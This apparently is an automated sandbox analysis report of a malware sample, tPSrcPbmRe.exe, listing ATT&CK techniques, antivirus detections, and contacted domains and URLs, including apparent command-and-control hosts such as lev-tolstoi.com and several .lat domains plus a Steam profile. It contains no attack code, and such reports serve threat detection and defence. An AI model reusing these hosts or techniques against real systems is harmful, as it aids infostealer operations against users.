Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: Windows Management Instrumentation (2); PowerShell (1); At; Cron; Launchd; Scheduled Task
Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Privilege Escalation: Process Injection (1); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Defense Evasion: Virtualization/Sandbox Evasion (34); Process Injection (1); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (2); Software Packing (12); DLL Side-Loading (1)
Credential Access: OS Credential Dumping (2); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: Query Registry (1); Security Software Discovery (751); Virtualization/Sandbox Evasion (34); Process Discovery (2); File and Directory Discovery (2); System Information Discovery (223)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: Archive Collected Data (1); Data from Local System (41); Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Command and Control: Encrypted Channel (11); Ingress Tool Transfer (1); Non-Application Layer Protocol (3); Application Layer Protocol (114); Fallback Channels; Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop



Source | Detection | Scanner | Label
tPSrcPbmRe.exe | 68% | ReversingLabs | Win32.Trojan.Generic
tPSrcPbmRe.exe | 69% | Virustotal |
tPSrcPbmRe.exe | 100% | Avira | TR/Crypt.XPACK.Gen
tPSrcPbmRe.exe | 100% | Joe Sandbox ML |
                No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
steamcommunity.com | 23.55.153.106 | true | false | | high
lev-tolstoi.com | 104.21.66.86 | true | false | | high
sustainskelet.lat | unknown | unknown | false | | high
crosshuaht.lat | unknown | unknown | false | | high
rapeflowwj.lat | unknown | unknown | false | | high
grannyejh.lat | unknown | unknown | false | | high
aspecteirs.lat | unknown | unknown | false | | high
sweepyribs.lat | unknown | unknown | false | | high
discokeyus.lat | unknown | unknown | false | | high
energyaffai.lat | unknown | unknown | false | | high
necklacebudi.lat | unknown | unknown | false | | high
Name | Malicious | Antivirus Detection | Reputation
aspecteirs.lat | false | | high
sweepyribs.lat | false | | high
sustainskelet.lat | false | | high
rapeflowwj.lat | false | | high
https://steamcommunity.com/profiles/76561199724331900 | false | | high
energyaffai.lat | false | | high
https://lev-tolstoi.com/api | false | | high
grannyejh.lat | false | | high
necklacebudi.lat | false | | high
crosshuaht.lat | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png | tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/chrome_newtab | tPSrcPbmRe.exe, 00000000.00000003.2221974377.0000000005B1A000.00000004.00000800.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2221810075.0000000005B1D000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://player.vimeo.com | tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001330000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/ac/?q= | tPSrcPbmRe.exe, 00000000.00000003.2221974377.0000000005B1A000.00000004.00000800.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2221810075.0000000005B1D000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://lev-tolstoi.com/piP | tPSrcPbmRe.exe, 00000000.00000003.2267092336.00000000012EA000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2271074155.00000000012ED000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp | tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://steamcommunity.com/?subsection=broadcasts | tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://lev-tolstoi.com/s | tPSrcPbmRe.exe, 00000000.00000003.2320307864.00000000012F5000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://lev-tolstoi.com/piH | tPSrcPbmRe.exe, 00000000.00000003.2320307864.00000000012F5000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://lev-tolstoi.com/apire | tPSrcPbmRe.exe, 00000000.00000003.2320110166.00000000012C6000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://store.steampowered.com/subscriber_agreement/ | tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.gstatic.cn/recaptcha/ | tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001330000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2221021952.00000000012ED000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=hyEE | tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001330000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2198759288.00000000012AD000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.valvesoftware.com/legal.htm | tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&amp;l=en | tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.youtube.com | tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001330000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.google.com | tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001330000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://lev-tolstoi.com/api) | tPSrcPbmRe.exe, 00000000.00000002.2377038945.0000000001354000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2369474716.0000000001354000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2336790976.0000000001354000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://lev-tolstoi.com/api( | tPSrcPbmRe.exe, 00000000.00000003.2267092336.00000000012EA000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2271074155.00000000012ED000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback | tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6 | tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001330000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2198759288.00000000012AD000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ | tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001330000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2221021952.00000000012ED000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&amp;l=engl | tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmp | false
                                                                                                        high
                                                                                                        https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&amp;l=englistPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbCtPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://s.ytimg.com;tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001330000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2221021952.00000000012ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001330000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&amp;l=english&tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://community.fastly.steamstatic.com/tPSrcPbmRe.exe, 00000000.00000003.2221021952.00000000012ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://lev-tolstoi.com/dtPSrcPbmRe.exe, 00000000.00000003.2267092336.00000000012EA000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2271074155.00000000012ED000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2221021952.00000000012ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      unknown
                                                                                                                      https://steam.tv/tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001330000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2221021952.00000000012ED000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2223120012.000000000132F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&amp;l=entPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://lev-tolstoi.com/2UtPSrcPbmRe.exe, 00000000.00000002.2377002468.00000000012EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            unknown
                                                                                                                            https://lev-tolstoi.com/tPSrcPbmRe.exe, tPSrcPbmRe.exe, 00000000.00000003.2267311649.0000000005AD5000.00000004.00000800.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2320307864.00000000012F5000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2245471516.000000000135C000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2268779813.0000000005AD6000.00000004.00000800.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2198657134.00000000012ED000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2267092336.00000000012EA000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2220955202.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2369256724.0000000005AD1000.00000004.00000800.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2320254445.0000000005AD5000.00000004.00000800.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2271074155.00000000012ED000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2293272842.0000000005AD5000.00000004.00000800.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2245238274.0000000001354000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000002.2378751257.0000000005AD6000.00000004.00000800.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2245414561.0000000001354000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2221021952.00000000012ED000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2220817144.000000000133A000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2198759288.00000000012AD000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 
00000000.00000003.2293140651.00000000012EA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              http://store.steampowered.com/privacy_agreement/tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001330000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYitPSrcPbmRe.exe, 00000000.00000003.2293272842.0000000005AD5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://store.steampowered.com/points/shop/tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=tPSrcPbmRe.exe, 00000000.00000003.2221974377.0000000005B1A000.00000004.00000800.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2221810075.0000000005B1D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://crl.rootca1.amazontrust.com/rootca1.crl0tPSrcPbmRe.exe, 00000000.00000003.2269408398.0000000005AF8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://ocsp.rootca1.amazontrust.com0:tPSrcPbmRe.exe, 00000000.00000003.2269408398.0000000005AF8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&amp;l=english&atPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://sketchfab.comtPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001330000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://www.ecosia.org/newtab/tPSrcPbmRe.exe, 00000000.00000003.2221974377.0000000005B1A000.00000004.00000800.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2221810075.0000000005B1D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://lv.queniujq.cntPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001330000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://steamcommunity.com/profiles/76561199724331900/inventory/tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001330000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brtPSrcPbmRe.exe, 00000000.00000003.2271122226.0000000005DFD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://www.youtube.com/tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001330000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2221021952.00000000012ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://store.steampowered.com/privacy_agreement/tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&amp;l=engtPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&amp;l=english&amtPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://www.google.com/recaptcha/tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001330000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2221021952.00000000012ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://checkout.steampowered.com/tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001330000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2221021952.00000000012ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://store.steampowered.com/;tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001330000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://store.steampowered.com/about/tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://steamcommunity.com/my/wishlist/tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&amp;tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://help.steampowered.com/en/tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://steamcommunity.com/market/tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://store.steampowered.com/news/tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=St3gSJx2HFUZ&amp;l=etPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=tPSrcPbmRe.exe, 00000000.00000003.2221974377.0000000005B1A000.00000004.00000800.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2221810075.0000000005B1D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    http://store.steampowered.com/subscriber_agreement/tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001330000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2198759288.00000000012AD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgtPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001330000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://lev-tolstoi.com/apiytPSrcPbmRe.exe, 00000000.00000003.2221021952.00000000012ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          unknown
                                                                                                                                                                                          https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpgtPSrcPbmRe.exe, 00000000.00000003.2293272842.0000000005AD5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://recaptcha.net/recaptcha/;tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001330000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              https://steamcommunity.com/discussions/tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                https://store.steampowered.com/stats/tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&amtPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    high
URL: https://lev-tolstoi.com:443/apiWdtPWdtP
  Source: tPSrcPbmRe.exe, 00000000.00000002.2377038945.000000000133F000.00000004.00000020.00020000.00000000.sdmp; tPSrcPbmRe.exe, 00000000.00000003.2336933688.000000000133D000.00000004.00000020.00020000.00000000.sdmp; tPSrcPbmRe.exe, 00000000.00000003.2336790976.0000000001330000.00000004.00000020.00020000.00000000.sdmp; tPSrcPbmRe.exe, 00000000.00000003.2375660843.000000000133F000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false    Reputation: unknown
URL: https://medal.tv
  Source: tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001330000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false    Reputation: high
URL: https://broadcast.st.dl.eccdnx.com
  Source: tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001330000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false    Reputation: high
URL: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
  Source: tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp; tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false    Reputation: high
URL: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&amp;l=english&a
  Source: tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp; tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false    Reputation: high
URL: https://store.steampowered.com/steam_refunds/
  Source: tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp; tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false    Reputation: high
URL: http://x1.c.lencr.org/0
  Source: tPSrcPbmRe.exe, 00000000.00000003.2269408398.0000000005AF8000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false    Reputation: high
URL: http://x1.i.lencr.org/0
  Source: tPSrcPbmRe.exe, 00000000.00000003.2269408398.0000000005AF8000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false    Reputation: high
URL: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
  Source: tPSrcPbmRe.exe, 00000000.00000003.2221974377.0000000005B1A000.00000004.00000800.00020000.00000000.sdmp; tPSrcPbmRe.exe, 00000000.00000003.2221810075.0000000005B1D000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false    Reputation: high
URL: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a
  Source: tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp; tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmp; tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001330000.00000004.00000020.00020000.00000000.sdmp; tPSrcPbmRe.exe, 00000000.00000003.2198759288.00000000012AD000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false    Reputation: high
URL: https://lev-tolstoi.com/apiBy
  Source: tPSrcPbmRe.exe, 00000000.00000003.2245238274.0000000001331000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false    Reputation: unknown
URL: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
  Source: tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false    Reputation: high
URL: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
  Source: tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp; tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false    Reputation: high
URL: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&amp;l=e
